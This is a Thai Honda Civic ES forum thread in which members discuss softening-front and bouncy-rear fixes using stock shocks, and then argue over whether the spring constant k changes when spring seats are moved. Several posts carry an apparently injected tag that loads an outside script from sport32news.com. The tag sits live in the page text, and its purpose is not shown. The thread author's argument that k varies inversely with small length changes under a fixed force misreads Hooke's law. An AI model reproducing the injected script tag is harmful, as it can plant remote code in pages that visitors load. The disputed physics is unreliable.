ตอบ
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 8 สิงหา 2014 23:42 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ขอเขียนในแบบที่ทุกคนเข้าใจได้ ไม่อิงวิชาการมากนะครับ


เป็นที่ทราบกันดีว่ารุ่นนี้หน้านุ่มเกินท้ายเด้งไป และติดแก๊สแบกถังเพิ่มเข้าไปตูดก็ห้อยอีกเด้งเข้าไปใหญ่ จะแก้ไงดีล่ะ มาดูวิธีของผมกัน

คอนเส็ป : เตี้ยลงไม่เกิน 1 นิ้ว หน้ากระชับขึ้น ท้ายเด้งต้องหาย ขับสบาย

โช๊คคู่หน้า อัดน้ำมันเบอร์ 2 (ความหนืดเท่าของเดิม) เลื่อนเบ้าลง (ประมาณครึ่งนิ้ว)
โช๊คคู่หลัง อัดน้ำมันเบอร์ 3 (ความหนืดเพิ่มขึ้น 1 step)

มาดูเหตุผลว่าทำไมถึงเป็นสเต็ปนี้

คู่หน้า : ปัญหาด้านหน้าก็มีโช๊คนุ่มไปซุ้มล้อที่สูงกว่าด้านหลังและยังดูสูงเกินไป ผมจึงเลือกที่จะเลื่อนเบ้าลง แต่ยังคงความหนืดไว้เท่าเดิมเพราะว่า เมื่อเราเลื่อนเบ้าลง ค่า K จะลดลง เมื่อเราคงความหนืดไว้เท่าเดิมอาการยวบยาบจากความนุ่มของคู่หน้าก็จะลดลงด้วย กระชับขึ้น และเมื่อค่า K ลดลง จะได้ความเตี้ยเพิ่มอีกหน่อย รวมๆกับการเลื่อนเบ้าแล้วเตี้ยลงราวๆ 1 นิ้ว

คู่หลัง : ปัญหาท้ายเด้งเกิดจาก ตัวโช๊คจับสปริงไม่อยู่ วิธีแก้ก็ง่ายมาก เพิ่มความหนืดขึ้นอีก 1 step เพื่อจับการเด้งของสปริงให้อยู่ ความสูงจะยังคงเดิม แต่ได้ความเตี้ยจากน้ำหนักบรรทุกจึงได้ความพอดีของความสูงที่ต้องการ ท้ายไม่เด้ง ตูดไม่ห้อยแล้ว

เสร็จแล้วก็จะได้ภาพลักษณ์ประมาณนี้ครับ

 


Attached File :
แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
Attached File :
แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
Attached File :
แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง


แก้ไขล่าสุดโดย เมื่อ อาทิตย์, 10 สิงหา 2014 00:16, ทั้งหมด 2 ครั้ง (ดูทั้งหมด)
suwanachai.anukul.9


เข้าร่วม: 06 กุมภา 2014
ตอบ: 226

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 244
ให้คำขอบคุณ: 1

ที่อยู่: ถนนกิ่งแก้ว บางพลี สมุทรปราการ
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 9 สิงหา 2014 01:04 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
โช๊คเดิม สปิงเดิมหราคับ
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 9 สิงหา 2014 07:40 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
suwanachai.anukul.9 พิมพ์ว่า:
โช๊คเดิม สปิงเดิมหราคับ



เดิมคร้าบบบบ
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 9 สิงหา 2014 08:28 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
อือๆพูดแล้วฟังดูดีมีฐานะ
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 9 สิงหา 2014 08:43 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
อือๆพูดแล้วฟังดูดีมีฐานะ




ยากจน <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
khunjoke


เข้าร่วม: 27 กรกฎา 2013
ตอบ: 96

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 59
ให้คำขอบคุณ: 10

ที่อยู่: บางปู สมุทรปราการ
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 9 สิงหา 2014 08:43 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
เจ๋งเลยครับแนวทางนี้
ได้รับคำขอบคุณจาก: athongchum 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 9 สิงหา 2014 08:48 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
athongchum พิมพ์ว่า:
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
อือๆพูดแล้วฟังดูดีมีฐานะ




ยากจน <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></




เอาเป็นว่าคนเล่นโช้คฟังแล้วไม่ติเลยอ่ะ"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: athongchum 
เทพ


ชื่อเล่น: เทพ

เข้าร่วม: 10 เมษา 2013
ตอบ: 424

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 280
ให้คำขอบคุณ: 1

ที่อยู่: ระยอง
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 9 สิงหา 2014 08:52 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
สวดยวดเล๊ย รวกเพ้ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: athongchum 
JeepLNZ


เข้าร่วม: 26 มิถุนา 2012
ตอบ: 407

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 268
ให้คำขอบคุณ: 108

ที่อยู่: สายไหม กรุงเทพฯ & เพชรบูรณ์
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
เสาร์, 9 สิงหา 2014 11:15 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
..
ได้รับคำขอบคุณจาก: athongchum 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
เสาร์, 9 สิงหา 2014 11:39 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ตามทฤษฏีค่า k มันคงที่นะครับ

F = kx

F/x = k

เมื่อ k คงที่ แต่มีระยะที่ยืดได้มากขึ้นคือ x มากขึ้น ทำให้รับแรง F ได้เพิ่มขึ้นด้วย เลยรู้สึกว่ารถหนึบขึ้น
ได้รับคำขอบคุณจาก: athongchum  jeang 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 9 สิงหา 2014 12:37 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
Ton- พิมพ์ว่า:
ตามทฤษฏีค่า k มันคงที่นะครับ

F = kx

F/x = k

เมื่อ k คงที่ แต่มีระยะที่ยืดได้มากขึ้นคือ x มากขึ้น ทำให้รับแรง F ได้เพิ่มขึ้นด้วย เลยรู้สึกว่ารถหนึบขึ้น







ผมมาลองคิดวิเคราะห์อีกที ค่า k มันเปลี่ยนไปตามระยะยืดนะครับ

จากสูตร k=F/x  เมื่อ

F คือ แรงจากน้ำหนักตัวรถ + แรง G ซึ่งเป็นตัวแปรที่ไม่เปลี่ยนแปลงสำหรับรถคันเดียวกัน

x คือ ระยะยืดของสปริง ซึ่งเปลี่ยนไปเมื่อมีการเลื่อนเบ้า

ดังนั้น เมื่อ x เปลี่ยนไป k ก็ต้องแปรผันตาม x 

และหลังจากที่ไปค้นหาข้อมูลมา ไปเจอกระทู้ของพี่เอง "Review : Swift Springs ใส่ใน TEIN SS ครับ"

http://www.civicesgroup.com/forum/topic34595

พี่เขียนไว้ว่า

แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง

 


แก้ไขล่าสุดโดย เมื่อ อาทิตย์, 10 สิงหา 2014 07:49, ทั้งหมด 2 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  Ton- 
domziia


ชื่อเล่น: เจต

เข้าร่วม: 24 กุมภา 2012
ตอบ: 1246

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1167
ให้คำขอบคุณ: 3865

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 9 สิงหา 2014 13:12 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
แนวทางที่ดีสำหรับโชคเดิม
ได้รับคำขอบคุณจาก: athongchum 
Tod_Kurono


เข้าร่วม: 26 พฤศจิกา 2013
ตอบ: 124

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 104
ให้คำขอบคุณ: 40

ที่อยู่: กทม
ปี: 2004
เสาร์, 9 สิงหา 2014 14:21 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
แล้วทำที่ไหนดีระครับแนะหน่อยครับ ขอบคุณ
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 9 สิงหา 2014 14:28 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
Tod_Kurono พิมพ์ว่า:
แล้วทำที่ไหนดีระครับแนะหน่อยครับ ขอบคุณ



รัานซ่อมโช๊คทั่วไปครับ แต่ถ้าเอาถนัดรุ่นนี้ก็ไปพรเทพโช๊คอัพ
nammon_211


ชื่อเล่น: น้ำมนต์

เข้าร่วม: 12 มิถุนา 2013
ตอบ: 2081

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1949
ให้คำขอบคุณ: 1031

ที่อยู่: ESC / แหลมฉบัง ชลบุรี@ นครศรีธรรมราช
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 9 สิงหา 2014 18:22 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
. .
ได้รับคำขอบคุณจาก: athongchum 
thanatphong


เข้าร่วม: 05 มิถุนา 2009
ตอบ: 2693

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5343
ให้คำขอบคุณ: 20

ที่อยู่: zone none ( civic es only)
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 10 สิงหา 2014 03:33 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
โลตัสแคลาย อิอิ
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 10 สิงหา 2014 07:51 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
thanatphong พิมพ์ว่า:
โลตัสแคลาย อิอิ




วิวที่ท่านคุ้นเคย <script src="https://sport32news.com/civicesgroup.js"></
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
อาทิตย์, 10 สิงหา 2014 10:06 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ครับมันคือตามทฤษฎีไง ค่า k คือค่าคงที่ และอีกอย่างสปริงที่ผมอ้างถึงคือสปริงหลอดที่ใส่กับโช้คแต่งที่มันขดเล็กๆที่เลือกค่า k ได้
ในความเป็นจริงสปริงที่ผลิตค่า k ก็ไม่ได้คงที่ไปตลอดช่วงการใช้งาน อันนี้ผมละไว้

ค่า f เองก็ไม่ได้คงที่ เพราะรถมีแรงโยกขึ้นลงตลอด ลงคิดดูว่าถ้ายืนอยู่เฉยๆบนตาชั่งเราชั่งได้น้ำหนักมาค่านึง ลองโยกตัวคุณขึ้นลง จะเห็นค่าบนตาชั่งเปลี่ยนไปมาแน่นอน

ออกตัวไว้ก่อนว่า ถกกันเพื่อความรู้นะครับ ถูกผิดผู้อ่านที่สนใจลองค้นคว้าดูต่อเอง
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 10 สิงหา 2014 10:30 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
Ton- พิมพ์ว่า:
ครับมันคือตามทฤษฎีไง ค่า k คือค่าคงที่ และอีกอย่างสปริงที่ผมอ้างถึงคือสปริงหลอดที่ใส่กับโช้คแต่งที่มันขดเล็กๆที่เลือกค่า k ได้
ในความเป็นจริงสปริงที่ผลิตค่า k ก็ไม่ได้คงที่ไปตลอดช่วงการใช้งาน อันนี้ผมละไว้

ค่า f เองก็ไม่ได้คงที่ เพราะรถมีแรงโยกขึ้นลงตลอด ลงคิดดูว่าถ้ายืนอยู่เฉยๆบนตาชั่งเราชั่งได้น้ำหนักมาค่านึง ลองโยกตัวคุณขึ้นลง จะเห็นค่าบนตาชั่งเปลี่ยนไปมาแน่นอน

ออกตัวไว้ก่อนว่า ถกกันเพื่อความรู้นะครับ ถูกผิดผู้อ่านที่สนใจลองค้นคว้าดูต่อเอง




สปริงก็คือสปริงครับ จะเป็นสปริงหลอดของโช๊คแต่งหรือสปริงของโช๊คเดิมมันก็เหมือนกัน สปริงใส่กับโช๊คเดิมก็เลือกค่า K ได้ มีหลายยี่ห้อที่ผลิตออกมาในรูปแบบของสปริงโหลด

ถ้าพี่บอกว่า "ในความเป็นจริงสปริงที่ผลิตค่า k ก็ไม่ได้คงที่ไปตลอดช่วงการใช้งาน อันนี้ผมละไว้" ก็หมายความว่าที่ผมพูดไว้ก็ถูกแล้ว 

ค่า K เป็นค่าคงที่ใช่ครับ แต่เป็นค่าคงที่ที่ระยะความยาวคงที่ ใช้เพื่อคำนวณหาปริมาณแรง F ที่สปริงจะรับได้ เมื่อความยาวเปลี่ยนไปค่า K ก็เปลี่ยนตาม ตามสูตร K=F/X ที่พี่ว่าเอาไว้ การเลื่อนเบ้าก็เป็นการเปลี่ยนระยะสปริงให้ยาวขึ้น เพราะฉะนั้นค่า K ก็จะเปลี่ยนตามไปในทางค่า K ลดลง

ส่วนค่า F ที่ผมบอกไว้ ก็บอกไว้แล้วว่าเป็นแรงจากน้ำหนักรถ + แรง G ซึ่งแรง G ก็คืออาการที่รถโยกขึ้นโยกลงตลอดเวลา ที่บอกว่าเป็นตัวแปรที่ไม่เปลี่ยนแปลงเพราะมันเป็นรถคันเดียวกัน มันก็โยกขึ้นโยกลงเหมือนเดิม เป็นความหมายของคำว่า ค่า F ไม่เปลี่ยนแปลง ไม่ได้บอกว่ามันเป็นค่าคงที่ครับ
ได้รับคำขอบคุณจาก: Ton-  ค้าอะไหล่โคตรเก่า 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
อาทิตย์, 10 สิงหา 2014 10:47 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ถ้าคุณเข้าใจว่าระยะเปลี่ยนนิดเดียวแล้ว k เปลี่ยนทันทีอันนี้คุณเข้าใจผิดแล้วนะ ที่ผมบอกว่า k ไม่เท่าตลอดช่วงคือ ถ้ากดสปริงลงไปมากๆเช่น 3-4 นื้วมันจะแข็งขึ้น แต่ถ้า 1 นิ้ว อาจจะไม่เปลี่ยนเลย

แล้วความกว้างของขดสปริงก็มีผลต่อ usable distance ที่ค่า k ควรจะคงที่ สปริงหลอดเล็กๆ อาจจะมี usable distance น้อยกว่าสปริงขดใหญ่

usable distance คือช่วงการยืดหดที่ค่า k ไม่เปลี่ยนแปลง
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 10 สิงหา 2014 11:04 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
Ton- พิมพ์ว่า:
ถ้าคุณเข้าใจว่าระยะเปลี่ยนนิดเดียวแล้ว k เปลี่ยนทันทีอันนี้คุณเข้าใจผิดแล้วนะ ที่ผมบอกว่า k ไม่เท่าตลอดช่วงคือ ถ้ากดสปริงลงไปมากๆเช่น 3-4 นื้วมันจะแข็งขึ้น แต่ถ้า 1 นิ้ว อาจจะไม่เปลี่ยนเลย

แล้วความกว้างของขดสปริงก็มีผลต่อ usable distance ที่ค่า k ควรจะคงที่ สปริงหลอดเล็กๆ อาจจะมี usable distance น้อยกว่าสปริงขดใหญ่

usable distance คือช่วงการยืดหดที่ค่า k ไม่เปลี่ยนแปลง




พี่ชวนผมคุยเรื่องทฤษฎีไม่ใช่เหรอครับ

สมมุติ

F=10
X=5

จาก      K=F/X
แทนค่า  K=10/5
จะได้     K=2

ทีนี้ลองเปลี่ยนค่า X ไปสักนิดนึง

F=10
X=4.8

จาก      K=F/X
แทนค่า  K=10/4.8
จะได้     K=2.0833333


จากทฤษฎีจะเห็นว่า ค่า K จะแปรผกผันตลอดกับค่า X 

สรุปก็คือไม่ว่าค่าตัวไหนจะเปลี่ยนไปแค่ไหน จะมากจะน้อย ค่าอื่นก็จะเปลี่ยนตามตลอด ถ้าวัดจากความรู้สึกอาจจะไม่เปลี่ยน แต่ถ้าวัดตามทฤษฎีมันเปลี่ยนแน่นอน

ส่วนค่า usable distance ขึ้นอยู่กับคุณสมบัติการออกแบบ ของแต่ละค่ายแต่ละแบบ

สำหรับผมที่เลื่อนเบ้าลงมาครึ่งนิ้ว มันเปลี่ยนครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  Ton- 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 10 สิงหา 2014 11:13 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ผมว่าทุกอย่างที่เปลี่ยนไปมีผลนะ ค่าเค ความกว้าง ความยาวของสปริง น้ำหนักรถที่ไม่เท่ากันของแต่ละคัน การบรรทุก การใช้งานที่แตกต่างกัน ผมขายโช้คปีละประมาณ 50 ชุดทุกวันนี้ผมก็คิดว่าผมไม่รู้อะไร วันนี้ขนสปริงขึ้นรถ 10 คู่พรุ่งไปทะเลาะกับช่างต่อ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 10 สิงหา 2014 11:39 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง

จากข้อ 4 ที่พี่ Ton บอกไว้นั้น ผมว่าพี่เข้าใจผิดแล้วนะ

การปรับสูงต่ำของโช๊คที่ไม่มีสไลด์กระบอก สปริงถูกบังคับให้ยึดติดด้วยระยะ rebound ไม่งั้นสปริงจะหลุดเบ้า ถ้าจะปรับสูงต่ำเราต้องปรับจากค่า k ของสปริง 

บีบสปริงเยอะ ระยะสั้นลง ค่า k สูง รถจะสูง
บีบสปริงน้อย ระยะยาวขึ้น ค่า k ต่ำ รถจะเตี้ย

ถ้าพูดภาษาชาวบ้าน การบีบสปริงเปรียบสเหมือนการจำลองแรงกดจากน้ำหนักรถ ตัวอย่างเช่น (เน้นว่าเป็นตัวอย่างเป็นค่าสมมุติไม่มีการคำนวณใดๆทั้งสิ้น)

รถหนัก 1000 กิโล เมื่อเราบีบสปริงขึ้นไปอีก 1 นิ้ว จะสเมือนการจำลองน้ำหนักรถกดทับสปริงลงไปแล้ว 200 กิโล ก็จะสเหมือนว่าน้ำหนักรถลดลงเหลือ 800 กิโล รถก็จะสูงขึ้น

ถ้าพี่บอกว่า พี่สามารถปรับสูงต่ำได้ตามใจโดยที่ค่า k ไม่เปลี่ยน ผมอยากถามว่าพี่ปรับยังไงครับ?
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  Ton- 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
อาทิตย์, 10 สิงหา 2014 15:34 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ที่ผมอธิบาย มันฟิสิคส์ ม ปลายนะครับ ผมไม่ได้เถียงแบบเอาประสบการณ์ส่วนตัวมาพูด สิ่งที่น้องคำนวณแสดงว่ายังไม่เข้าใจหลักการทำงานของสปริงและค่า k อย่างแท้จริง เอาเป็นว่าผมขอหยุดเท่านี้ดีกว่า เพราะถกกันไปคนละทางแล้วครับ

ปล สิ่งที่ผมเขียนตอนทำรีวิว swift spring อาจจะไม่ถูกซะทีเดียว เพราะตอนนั้นไม่ได้มานั่งคิดอะไรมากอาศัยความรู้สึกส่วนตัวล้วนๆบวกกับอ่านจากบางเวปไซต์เอา เวปที่อ้างอิงไว้ก็หายไปซะแล้วด้วย แต่ข้อ 4 ถูกตามที่เวปผู้ผลิตให้ไว้แน่นอนอันนี้ไม่ได้มั่ว คำอธิบายก็ได้ให้ไว้แล้ว

ปล 2 อันนี้ไม่เกี่ยวกับเรื่องรถนะ แต่ขอชี้แจงนิดนึงไม่อยากให้จำไปใช้ผิดๆ ค่าคงที่ก็คือค่าคงที่มันจะคงที่เสมอตามสมการ ไม่อย่างนั้นมันจะถูกเรียกว่า "ตัวแปร" ไม่ถูกเรียกว่า "ค่าคงที่" อันนี้ที่ผมเรียนมานะครับ สมการที่น้องอ้างถึง น้องกลับให้ f คงที่แล้วเปลี่ยนให้ k เป็นตัวแปร อันนี้ผิดแน่นอน อธิบายตามทฤษฎีก็คือเมื่อ k คงที่ แรงกระทำ f จะทำให้สปริงเคลื่อนไปเป็นระยะ x

ภาษาชาวบ้านก็คือค่า k เท่าเดิมคือ ถ้ามีแรงมากระทำ 1000 นิวตันจะทำให้สปริงเคลื่อนไป 1 ซม ถ้ามีแรงมากระทำ 800 สปริงจะเคลื่อนไป 0.8 อะไรแบบนี้

ขออภัยสมาชิกด้วยถ้าทำให้ท่านรู้สึกกรำคาญว่าผมจะมาอ้างทฤษฎีอะไรมากมาย ผมขอหยุดแค่นี้ละกันครับ กระทู้นี้ผมก็ไม่ได้ตั้งด้วยจะเป็นการเสียมารยาทเปล่า
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 10 สิงหา 2014 15:50 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ค่า k เป็นค่าคงที่จริงครับ แต่...

ค่า k จะถูกคำนวณจาก การถ่วงน้ำหนักหรือกดน้ำหนัก ในสภาวะที่สปริงอิสระ แต่ในรถ สปริงจะไม่อิสระถูกบังคับระยะสปริงด้วยระยะ rebound ของโช๊ค

ซึ่งความเป็นจริงคือสปริงจะยาวกว่าระยะ rebound มันทำให้สปริงถูกกดอยู่ เมื่อระยะเปลี่ยนไปค่า k ของสปริงต้องถูกคำนวณใหม่ 

